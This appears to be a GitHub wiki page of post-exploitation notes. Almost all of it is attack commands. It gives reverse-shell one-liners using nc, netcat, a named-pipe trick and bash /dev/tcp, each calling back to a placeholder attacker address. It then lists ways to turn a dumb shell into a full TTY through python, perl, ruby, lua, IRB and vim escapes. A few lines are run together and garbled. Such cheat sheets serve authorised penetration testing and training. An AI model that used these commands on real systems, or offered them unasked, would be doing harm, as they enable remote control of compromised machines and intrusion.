-
Notifications
You must be signed in to change notification settings - Fork 52
Post Exploitation
Jakob Pennington edited this page Feb 4, 2019
·
2 revisions
If we ger RCE on a machine by some means, how can we spawn a shell?
# With nc
nc LOCAL_IP LOCAL_PORT -e /bin/sh
# With netcat
netcat LOCAL_IP LOCAL_PORT -e /bin/sh
# nc with -e disabled
mknod backpipe p; nc LOCAL_IP LOCAL_PORT 0<backpipe | /bin/bash 1>backpipe
# without nc
/bin/bash -i > /dev/tcp/LOCAL_IP/LOCAL_PORT 0<&1 2>&1Often, exploits will return a dumb shell - you can send commands and recieve results, but nothing else. We want to own them like we own our own machines, TTY and all. Here's a list of ways to spawn a TTY shell from a dumb shell.
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh":!bash
:set shell=/bin/bash:shell!sh